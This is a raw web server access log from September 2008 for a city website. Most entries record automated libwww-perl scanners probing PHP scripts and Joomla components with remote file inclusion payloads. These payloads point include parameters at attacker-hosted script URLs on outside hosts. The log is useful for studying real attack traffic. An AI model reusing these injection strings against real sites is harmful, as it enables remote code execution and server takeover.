66.185.168.98 - - [01/Sep/2008:05:01:03 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:05:01:03 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:05:01:03 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:05:01:55 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:05:01:55 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:05:01:55 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
194.79.66.105 - - [01/Sep/2008:05:06:06 -0700] "GET /logs/access_080330.log/?path%5Bdocroot%5D=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.79.66.105 - - [01/Sep/2008:05:06:07 -0700] "GET /?path%5Bdocroot%5D=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.79.66.105 - - [01/Sep/2008:05:06:07 -0700] "GET /logs/?path%5Bdocroot%5D=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 200 4084 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.79.66.105 - - [01/Sep/2008:05:06:36 -0700] "GET /logs/access_071201.log/?path%5Bdocroot%5D=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:08:12 -0700] "GET /logs/access_080330.log//newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:08:12 -0700] "GET /logs/access_080330.log//newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:08:12 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:08:12 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:08:12 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:08:12 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:08:34 -0700] "GET /logs/access_071201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:08:37 -0700] "GET /logs/access_071201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:09:34 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:09:34 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:09:34 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:09:38 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:09:38 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:09:38 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:05:09:57 -0700] "GET /logs/access_080330.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cafetkoetshuis.nl/forum/phpbb/idbaru.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:05:09:57 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cafetkoetshuis.nl/forum/phpbb/idbaru.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:05:09:57 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cafetkoetshuis.nl/forum/phpbb/idbaru.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:10:41 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:10:53 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:10:58 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:10:58 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:10:59 -0700] "GET /logs/access.log//atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:10:59 -0700] "GET //atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:10:59 -0700] "GET /logs//atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:11:03 -0700] "GET /logs/access_080330.log//atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:11:03 -0700] "GET /logs/access.log//atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:11:03 -0700] "GET //atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:11:03 -0700] "GET /logs//atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:11:04 -0700] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:11:05 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:11:09 -0700] "GET /logs/access_080330.log//atom.php5?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:01 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:01 -0700] "GET //ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:01 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:04 -0700] "GET /logs/access_080330.log//ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:25 -0700] "GET /logs/access_080330.log//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:25 -0700] "GET //citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:25 -0700] "GET /logs//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:13:44 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:05:13:47 -0700] "GET /logs/access_080330.log/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:05:13:55 -0700] "GET /errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:13:58 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:13:58 -0700] "GET //ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:13:58 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:14:01 -0700] "GET /logs/access_080330.log//ashnews.php?pathtoashnews=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
194.79.66.105 - - [01/Sep/2008:05:16:36 -0700] "GET /?path%5Bdocroot%5D=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:17:16 -0700] "GET /logs/access_080330.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:17:16 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:17:16 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:05:17:18 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:05:17:18 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:05:17:18 -0700] "GET //config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:17:26 -0700] "GET /logs/access_080330.log//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:17:26 -0700] "GET //citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:17:26 -0700] "GET /logs//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:17:31 -0700] "GET /logs/access_080330.log//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:17:31 -0700] "GET //citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:17:31 -0700] "GET /logs//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:05:17:49 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:17:52 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:05:18:04 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:18:57 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:18:57 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:19:03 -0700] "GET /logs/access_080330.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:19:03 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:19:03 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:21:50 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:21:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:21:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:05:22:15 -0700] "GET /logs/access_080329.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:05:22:15 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:05:22:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:23:12 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:23:12 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:23:12 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:23:24 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:23:24 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:23:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:23:54 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:23:54 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:23:54 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.6.22.119 - - [01/Sep/2008:05:24:27 -0700] "GET /logs/access_070731.log HTTP/1.0" 200 391687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:26:46 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:26:47 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.98.192.98 - - [01/Sep/2008:05:26:53 -0700] "GET /logs/access_080329.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.98.192.98 - - [01/Sep/2008:05:26:54 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.98.192.98 - - [01/Sep/2008:05:26:58 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:27:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:27:29 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:27:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:05:27:31 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.157.127.237 - - [01/Sep/2008:05:29:13 -0700] "GET /logs/access.log HTTP/1.0" 200 345977 "http://phentermine-gl-pills.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:30:09 -0700] "GET /logs/access.log//claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:30:09 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:30:09 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:30:16 -0700] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:30:16 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:30:16 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:05:30:35 -0700] "GET /logs/access_080331.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:31:04 -0700] "GET /logs/access_080330.log//agendax/addevent.inc.php?agendax_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:31:04 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:05:31:04 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:05:31:15 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:05:31:19 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:32:37 -0700] "GET /logs/access_080330.log//agendax/addevent.inc.php?agendax_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:05:32:37 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
